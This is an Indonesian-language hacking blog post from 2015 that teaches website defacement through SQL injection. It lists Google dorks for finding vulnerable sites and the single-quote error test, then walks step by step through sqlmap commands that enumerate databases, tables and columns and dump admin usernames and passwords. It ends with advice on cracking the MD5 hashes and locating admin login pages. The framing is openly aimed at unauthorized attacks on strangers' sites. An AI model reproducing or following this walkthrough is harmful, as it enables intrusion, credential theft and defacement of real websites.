post-footer { margin-top: 0px; margin-bottom: 1px; padding: 3px 3px; border: 1px solid rgb(51, 153, 187); color: #262626; text-align: left; text-decoration: none; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background: url("http://3.bp.blogspot.com/-FzrNlaNHfGU/TruFiCf-5TI/AAAAAAAABE0/TJ8hbElYB5E/s1600/bg_spritebottom.gif") repeat-x scroll left bottom rgb(243, 244, 246); box-shadow: 1px 1px 6px 1px #0309f7; } .mobile .post-footer { margin-left: 0px; margin-right: 0px; margin-top: 0px; margin-bottom: 1px; padding: 2px 2px; border: none; text-align: left; text-decoration: none; background: inherit; border-radius: 0px; box-shadow: none; text-transform: capitalize; }

Sabtu, 25 April 2015

TEKHNIK DEFACE Dengan SQLMAP

hiii Pengunjung Setia Blog tercinta Aneee ...
kembali lagi nih dengan Ane wkwkwk
Seperti yang Ane Janjikan nih,Ane Mau Share Sdkit ilmu saja
yakni TEKHNIK DEFACE dengan SQLMAP

okedeh ... ga basa basi lagi nih yaa
biar ngerti ane kasih tutor Lengkap Dengan GAMBARNYA vrooh viar varokah :v 

Alat Alat Yang Perlu Di Siapin vrooh (yang pasti2 aje yee)
nihh alat2nya :
1.Sqlmap (kalau belum tau dimana downloadnya nih LINKnya)
2.Python 2.7.9 (Kalau ente blm punya juga nih Downloadnya DISINI)
3.Mechanize (Kalau blm punya jg ente ... mamposs aj dah wkwkwk....ga cma canda broo nih LINKnya)
4.biar ga tegang dan bingung mending sambil ngopi vrooh . jd asik dan cepat :P

okee Kalau alat2 dah siap tinggal PRAKTEK aja :P

Langkah 1 :
Gunakan DORK berikut :
inurl:/index.php?id='
inurl:/product.php?id='
inurl:/show.php?id='
NB : Tambahkan Domain Negara target semisal site: id/uk/us dibelakang dorknya :P
sisanya cari sendiri di mbah google kalau bsa sih di kembangin yak :P


Langkah 2
Ada Banyak Situs2 Target 
yang ente harus tau ... targetnya yang ada nomer dibelakangnya semisal index.php?id=32
liat gambar dibawah ini !!

Langkah Ke 3
Nah tinggal Klik Deh situs mna yang mau di sql tentunya ga semua situs looh bisa di sql :)
Kalau ente udah masuk ke situsnya ... cara mengetahui Situsnya VULN atau TIDAK VULN
gampang ...
tinggal tambahkan tanda string (') tanda petik dibelakang URL situsnya klau ada error semacam My Sql query/my sql affect expect parameter bolean givend in DSBnya itu berarti kemungkinan BESAR VULN !
liat gambar dibawah !



tapi kalau ga ada berarti ga vuln dan harus cari lagi ...
INGAT !! hanya situs yang ada IDnya /nomer dibelakang URL nya yang bisa dijadikan target !

Langkah ke 4
okee 
Ane Anggap Ente udah dapet tuh target tinggal Eksekusi saja !
Buka CMD !
pastinya ALAT2nya udah diextract blm ? 
kalau blm Extract dlu smuanya
Pythonnya INSTALL stlh di install (installnya di folder C yaa saran ane biar enak)
extract Sqlmap sama Mechanizenya kedalam python (hanya Data2nya doang bkn Zip/TARnya ...
okee kalau ente udah extract 
buka CMD !
truss ketik ini
cd C:/My Documents/Python27/mechanize
sebab karena C karena ane naruh Pytohn27nya di Folder Local disk C dan naruh di My Documents :P
Liat Di Gambar !
lalu kalau udah di folder mechanizenya 
setup.py install ! agar penginstalan mechanizenya untuk menjalankan SQL nya berjalan dengan lancar !
langkah ke 5
kembali ke situsnya
udah VULN kan ?
kalau udah eksekusi pakai ini
cd C:/My Documents/Python27/sqlmap
dan akn dipindahkan ke folder sql nanti
tinggal eksekusi
cd C:/My Documents/Python27/sqlmap.py -u http:///urltarget.co.uk/index.php?id=12 --dbs
arti --dbs adalah untuk memanggil database didalam situs tersebut
kalau udah tinggal tunggu selesai saja nanti klau ada perintah konfirmasi tekan (Y) aja trus
atau ada tulisan seperti ini "GET parameter "id" is vulnerable.do you want to keep testing the other 
itu tekan Y
liat gambar dibawah !
nanti databasenya akan muncul dengan sendiri
liat dibawah !
tinggal pilih deh database mana yang kira2 ada password dan username adminnya
kalau udah dapet kira2nya
ketik ini ulang lagi aja urlnya yang tadi
sqlmap.py -u http://urltargetente.index.php?id=13 -D(database yg ente pilih) --tables (memanggil tablenya) langsung enter! dan tunggu sebentar !
nah kalau udah ada tablesnya
tinggal pilih lagi kira2 dimana yaa username dan password adminnya
kalau udah ktmu
ketik lagi
sqlmap.py -u http://www.urltarget.co.uk/index.php?id=13 -D (database tadi) -T (tables yg ente pilih) --column (perintah untuk membuka Column)
lalu enter dan tunggu !!
nah
pasti keluar colom2 admin_user/admin_login * admin_pswd
nah eksekusi kembali lagi
ketik ini sqlmap.py -u http://www.urltargetente.co.uk/index.php?id=13 -D(database yg awal td prtma) -T (tables yg tadi kedua ente pilih) -C (column yg ente pilih klau 2 column ketik aj admin_user,admin_pw) lalu     --dump (perintah untuk mengeksekusi column terakhir)
dan TRALAAA !!
ketemu den admin user login dan passwordnya !
namun biasanya admin passwordnya biasanya berupa HASH jadi kamu harus Decrpyt dlu di md5 decrypt :)
liat gambar dibawah ! 
Kalau gitu mah tinggal gampang kelees!
cari admin page kalau udah HASH/Crack Admin PWnya :P
cari admin finder atau download Havij karena havij  ada tools admin Findernya :P

okeee
Sekian yaa Article dan pengetahuan yang Ane Kasih ke ente semua
Jangan Bosen Bosen Ke BLOG ane
belajar Sama Ane Dijamin Cepaat !! :P




HACKING IS NOT A CRIME
BUT
HACKING IS JUST ART !!

SALAM

ANONYMOUS INDONESIA


Mr.XSecr3t !!


JANGAN PERNAH BOSAN BERTANYA
KARENA MALU BERTANYA SESAT DIJALAN !!
DITUNGGU COMENTnya broo ! :p

Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)